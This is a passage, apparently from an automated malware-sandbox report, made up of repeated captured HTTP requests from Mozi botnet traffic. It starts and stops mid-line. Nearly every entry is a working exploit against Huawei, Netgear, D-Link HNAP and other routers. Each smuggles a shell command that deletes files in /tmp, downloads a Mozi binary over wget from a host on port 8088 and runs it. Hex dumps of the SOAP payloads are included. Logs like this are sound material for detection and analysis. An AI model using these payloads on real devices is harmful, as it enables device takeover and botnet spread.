xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 190.239.188.82:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 201.96.27.103:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 139.135.210.223:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 73.49.109.212:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 165.209.121.182:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 197.210.164.0:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 